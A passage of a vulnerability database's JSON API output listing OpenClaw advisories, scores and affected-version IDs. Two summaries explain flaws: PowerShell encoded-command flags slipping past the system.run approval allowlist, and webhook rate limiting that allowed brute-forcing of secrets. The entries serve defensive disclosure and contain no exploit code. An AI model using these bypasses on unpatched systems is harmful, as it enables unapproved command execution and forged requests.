/public2.vulnerablecode.io/vulnerabilities/VCID-kh5u-hg46-3qha"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/50763?format=json","vulnerability_id":"VCID-kp3a-gr66-zkam","summary":"OpenClaw's system.run allowlist approval parsing missed PowerShell encoded-command wrappers\nOpenClaw's `system.run` shell-wrapper detection did not recognize PowerShell `-EncodedCommand` forms 
as inline-command wrappers.\n\nIn `allowlist` mode, a caller with access to `system.run` could invoke `pwsh` or `powershell` using `-EncodedCommand`, `-enc`, or `-e`, and the request would fall back to plain argv analysis instead of the normal shell-wrapper approval path. This could allow a PowerShell inline payload to execute without the approval step that equivalent `-Command` invocations would require.\n\nLatest published npm version: `2026.3.2`\n\nFixed on `main` on March 7, 2026 in `1d1757b16f48f1a93cd16ab0ad7e2c3c63ce727d` by recognizing PowerShell encoded-command aliases during shell-wrapper parsing, so allowlist mode continues to require approval for those payloads. Normal approved PowerShell wrapper flows continue to work.","references":[{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"5.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:L"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/1d1757b16f48f1a93cd16ab0ad7e2c3c63ce727d","reference_id":"","reference_type":"","scores":[{"value":"5.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:L"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/1d1757b16f48f1a93cd16ab0ad7e2c3c63ce727d"},{"reference_url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.7","reference_id":"","reference_type":"","scores":[{"value":"5.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:L"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.7"},{"reference_url":"https://github.com/advisories/GHSA-3h2q-j2v4-6w5r","reference_id":
"GHSA-3h2q-j2v4-6w5r","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-3h2q-j2v4-6w5r"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-3h2q-j2v4-6w5r","reference_id":"GHSA-3h2q-j2v4-6w5r","reference_type":"","scores":[{"value":"5.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:L"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-3h2q-j2v4-6w5r"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/74554?format=json","purl":"pkg:npm/openclaw@2026.3.7","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-11dg-bvft-6kb1"},{"vulnerability":"VCID-1728-wc17-dud6"},{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1kk2-t48u-zkb2"},{"vulnerability":"VCID-1p3b-pfnn-x7ad"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-1smq-mbty-jkaj"},{"vulnerability":"VCID-1ufd-uuqk-nbdv"},{"vulnerability":"VCID-1y7e-y41k-qyfc"},{"vulnerability":"VCID-21eb-723m-xkfu"},{"vulnerability":"VCID-24eb-5jt8-aueq"},{"vulnerability":"VCID-24m7-jx1g-hqde"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-26sv-grsd-abcw"},{"vulnerability":"VCID-294z-6z8j-97bx"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2hca-3v8f-f3e8"},{"vulnerability":"VCID-2jsx-pvnr-6ydn"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2v8n-mnws-jfc9"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"v
ulnerability":"VCID-32zs-2zs9-uufs"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-37ep-9smd-zuh9"},{"vulnerability":"VCID-384t-z1h8-pfft"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3bdd-a9nw-13bn"},{"vulnerability":"VCID-3pqp-bneb-mbc4"},{"vulnerability":"VCID-3qbe-dsde-p7dz"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xeb-phgc-vkcg"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-44hp-3xh1-uyen"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4jwj-6s5z-wbeq"},{"vulnerability":"VCID-4nwq-14y4-xkhp"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4uqc-3h1c-4yhs"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-54mc-t5s7-wyes"},{"vulnerability":"VCID-5atj-2a7b-57g5"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-5s6h-u8x6-myfk"},{"vulnerability":"VCID-5u41-c7kc-u7fe"},{"vulnerability":"VCID-6849-th74-yqd5"},{"vulnerability":"VCID-6bxd-kbse-sudx"},{"vulnerability":"VCID-6rha-8r5p-jyb7"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7gju-19nh-7bgu"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-816s-45wb-83ce"},{"vulnerability":"VCID-849r-t5j1-vue8"},{"vulnerability":"VCID-84fd-3yvx-rfgq"},{"vulnerability":"VCID-84v2-s1yq-rkfr"},{"vulnerability":"VCID-8aek-6dw1-tudj"},{"vulnerability":"VCID-8uzb-xmf8-hbca"},{"vulnerability":"VCID-8z7r-a8dv-eueb"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"v
ulnerability":"VCID-9jjv-aa8k-rke1"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9pj9-7b12-jbea"},{"vulnerability":"VCID-9uyu-y9qv-u7e1"},{"vulnerability":"VCID-9v6f-dbmk-jygq"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-a2p8-ydn6-3bbr"},{"vulnerability":"VCID-a2t8-px5b-nfgd"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-aawy-8xg4-1uen"},{"vulnerability":"VCID-ad1h-m5fz-f3hu"},{"vulnerability":"VCID-afkf-r949-dkgu"},{"vulnerability":"VCID-aja9-wzp2-kbcj"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-asuy-amja-eyd4"},{"vulnerability":"VCID-atn7-pn13-3fgb"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-aye6-1fwu-nkc5"},{"vulnerability":"VCID-b7hq-mrhg-b3bk"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bg1d-gmxy-wkc6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bk76-1ctt-tkaw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-bnfh-rsk9-cfea"},{"vulnerability":"VCID-brfj-4shr-qkgc"},{"vulnerability":"VCID-bumq-54sb-6ua7"},{"vulnerability":"VCID-bzw7-yvu2-yqa2"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-cjjd-hv92-wbfn"},{"vulnerability":"VCID-csnc-r6fv-j3en"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-cvxu-rdbu-abd2"},{"vulnerability":"VCID-cwd3-ecym-sfaw"},{"vulnerability":"VCID-cyj6-zyuh-qug6"},{"vulnerability":"VCID-d3qp-5wm9-aqfp"},{"vulnerability":"VCID-d864-qy75-c3dx"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dbcw-brhj-k7hs"},{"vulnerability":"VCID-ddf9-tnrt-r7f2"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-djqx-bwuu-4uc1"},{"v
ulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dsvn-dpb5-tfdz"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-eaaf-8rfa-f3hz"},{"vulnerability":"VCID-ebwd-3xp4-7fdp"},{"vulnerability":"VCID-eda1-pnhb-bqes"},{"vulnerability":"VCID-em6w-a7mj-mqa4"},{"vulnerability":"VCID-ewa7-qswv-tqet"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-ftdn-9fum-cbe4"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-g9jn-c2rf-byem"},{"vulnerability":"VCID-gj27-bfws-uyfp"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-gncw-wfqt-9yek"},{"vulnerability":"VCID-gv2d-gfs7-gfh1"},{"vulnerability":"VCID-gvam-2net-8kc5"},{"vulnerability":"VCID-h4av-vgqn-aqcn"},{"vulnerability":"VCID-h8vg-ewrr-tfec"},{"vulnerability":"VCID-h9g5-xe4k-6udx"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hkqd-6khg-m3hj"},{"vulnerability":"VCID-hse8-g1e9-dbay"},{"vulnerability":"VCID-hynd-965v-n3aq"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-hzbt-fbgp-h7fd"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-j92n-5217-9bhj"},{"vulnerability":"VCID-j96c-kau3-7fag"},{"vulnerability":"VCID-jbwa-scg3-efeq"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jhah-j2td-t3dp"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-jtxm-z4vv-cqg7"},{"vulnerability":"VCID-k3up-1vdf-2uh9"},{"vulnerability":"VCID-k52b-966p-ybbk"},{"vulnerability":"VCID-k5da-7tht-w3bs"},{"vulnerability":"VCID-k7fe-dqzc-kbcm"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcba-tshp-77d6"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kh1q-871c-zkfa"},{"vulnerability":"VCID-kh5u-hg46-3qha"},{"vulnerability":"VCID-kthe-sgfb-kkb2"},{"v
ulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mggy-bv5s-5uax"},{"vulnerability":"VCID-mkka-hf2q-pfhp"},{"vulnerability":"VCID-mqzw-sq85-9ba2"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nf6w-v1pc-mbe5"},{"vulnerability":"VCID-nfva-pukn-uqch"},{"vulnerability":"VCID-njsr-j7vm-cqg8"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-nszj-2u6y-xqcb"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-nzu6-7a1g-4kf2"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-p984-bgmq-zqc9"},{"vulnerability":"VCID-pa1f-qzsh-efa9"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pc9z-x5wk-8ue7"},{"vulnerability":"VCID-pdgz-5fu2-g7af"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pgdr-mvc3-2kg3"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q38j-b9g9-8yar"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qhr2-jktm-uycx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-qjvc-etb4-qbfv"},{"vulnerability":"VCID-qquc-rw1d-m7ec"},{"vulnerability":"VCID-qr66-xgea-tufh"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-r5dj-qv5d-sqff"},{"vulnerability":"VCID-r9j7-ya3h-cbda"},{"vulnerability":"VCID-r9y1-z2ax-z3e2"},{"vulnerability":"VCID-rf6b-q7cj-jbgc"},{"vulnerability":"VCID-rkjm-wcmt-43br"},{"vulnerability":"VCID-rkx2-eq2x-q7d1"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-rswr-nd6z-vuhe"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"v
ulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-s4s8-8qea-q3fd"},{"vulnerability":"VCID-sddn-scg8-kqab"},{"vulnerability":"VCID-sh4x-nq7t-ykgg"},{"vulnerability":"VCID-sj4d-eenz-zqet"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-sw3m-5ryw-jbdh"},{"vulnerability":"VCID-swjf-k83n-h7gf"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t8e5-163r-37hc"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-tdjc-vav8-97cf"},{"vulnerability":"VCID-te8f-snty-j7hh"},{"vulnerability":"VCID-tf28-1z2z-5yfn"},{"vulnerability":"VCID-tk9h-nqrz-uugp"},{"vulnerability":"VCID-tkxh-m458-6ydw"},{"vulnerability":"VCID-tqzy-84fm-z7b6"},{"vulnerability":"VCID-twsq-vfde-4fbf"},{"vulnerability":"VCID-u1ru-vdfp-x3hu"},{"vulnerability":"VCID-u6hw-ffpj-4yd9"},{"vulnerability":"VCID-u9cw-crg5-1kbs"},{"vulnerability":"VCID-u9ja-dgsh-yug2"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v1bp-hw9a-yffz"},{"vulnerability":"VCID-v91b-1nmx-ckcx"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vm8g-hrvu-quhm"},{"vulnerability":"VCID-vqrj-z6tx-rff2"},{"vulnerability":"VCID-vtqt-bgz7-yub6"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2rd-2j4p-gfgw"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-w8sb-7ymy-wkez"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wfkm-7ayk-uuhb"},{"vulnerability":"VCID-wkye-je9r-1fba"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wut7-y72y-9ucb"},{"vulnerability":"VCID-wwcu-de9t-d3ca"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"v
ulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-x9qg-8qk5-s3d6"},{"vulnerability":"VCID-xdr6-tfsy-rqeu"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xpnh-32hh-p7fb"},{"vulnerability":"VCID-xpr3-hg3h-z3bz"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xux6-be95-e7ec"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xyck-sspa-4ba2"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-y8jc-h9ft-auge"},{"vulnerability":"VCID-ycse-95bv-7ua9"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z3rc-xpx7-fkcu"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-z8sm-pm9t-wyhu"},{"vulnerability":"VCID-z9a2-t66z-buga"},{"vulnerability":"VCID-zac2-wjyt-27af"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zf3q-78js-k7ce"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zhpy-h2b2-ekd8"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpb1-e3g9-vkbh"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.7"}],"aliases":["GHSA-3h2q-j2v4-6w5r"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-kp3a-gr66-zkam"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/91547?format=json","vulnera
bility_id":"VCID-kthe-sgfb-kkb2","summary":"OpenClaw: Zalo webhook rate limiting could be bypassed before secret validation\n### Summary\n\nThe Zalo webhook handler applied request rate limiting only after webhook authentication succeeded. Requests with an invalid secret returned `401` but did not count against the rate limiter, allowing repeated secret guesses without triggering `429`.\n\n### Impact\n\nThis made brute-force guessing materially easier for weak but policy-compliant webhook secrets. Once the secret was guessed, an attacker could submit forged Zalo webhook traffic.\n\n### Affected versions\n\n`openclaw` `<= 2026.3.11`\n\n### Patch\n\nFixed in `openclaw` `2026.3.12`. Rate limiting is now applied before the webhook secret is checked, so requests with an invalid secret also count against the rate limiter, closing the pre-auth brute-force gap. Users should update to `2026.3.12` or later and prefer strong webhook secrets.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-34505","reference_id":"","reference_type":"","scores":[{"value":"0.0002","scoring_system":"epss","scoring_elements":"0.05818","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00026","scoring_system":"epss","scoring_elements":"0.07765","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00026","scoring_system":"epss","scoring_elements":"0.07777","published_at":"2026-06-06T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-34505"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/f96ba87f033a14183fa0ede912df3a592eef55ff","reference_id":"","reference_type":"","scores":[{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT
:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/f96ba87f033a14183fa0ede912df3a592eef55ff"},{"reference_url":"https://github.com/openclaw/openclaw/pull/44173","reference_id":"","reference_type":"","scores":[{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/pull/44173"},{"reference_url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.12","reference_id":"","reference_type":"","scores":[{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.12"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-5m9r-p9g7-679c","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2026-03-31T13:53:27Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-5m9r-p9g7-679c"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-34505","reference_id":"","reference_type":"","scores":[{"value":"6.9","sc
oring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-34505"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-webhook-rate-limiting-bypass-via-pre-authentication-secret-validation","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2026-03-31T13:53:27Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-webhook-rate-limiting-bypass-via-pre-authentication-secret-validation"},{"reference_url":"https://github.com/advisories/GHSA-5m9r-p9g7-679c","reference_id":"GHSA-5m9r-p9g7-679c","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-5m9r-p9g7-679c"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/112780?format=json","purl":"pkg:npm/openclaw@2026.3.12","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-11dg-bvft-6kb1"},{"vulnerability":"VCID-1728-wc17-dud6"},{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1kk2-t48u-zkb2"},{"vulnerability":"VCID-1p3b-pfnn-x7ad"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-1smq-mbty-jkaj"},{"vulnerability":"VCID-1ufd-uuqk-nbdv"},{"vulnerability":"VCID-24eb-5jt8-aueq"},{"vulnerability":"VCID-24m7-jx1g-
hqde"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-26sv-grsd-abcw"},{"vulnerability":"VCID-294z-6z8j-97bx"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2hca-3v8f-f3e8"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2v8n-mnws-jfc9"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-32zs-2zs9-uufs"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-37ep-9smd-zuh9"},{"vulnerability":"VCID-384t-z1h8-pfft"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3bdd-a9nw-13bn"},{"vulnerability":"VCID-3pqp-bneb-mbc4"},{"vulnerability":"VCID-3qbe-dsde-p7dz"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xeb-phgc-vkcg"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-44hp-3xh1-uyen"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4jwj-6s5z-wbeq"},{"vulnerability":"VCID-4nwq-14y4-xkhp"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4uqc-3h1c-4yhs"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5atj-2a7b-57g5"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-5s6h-u8x6-myfk"},{"vulnerability":"VCID-6849-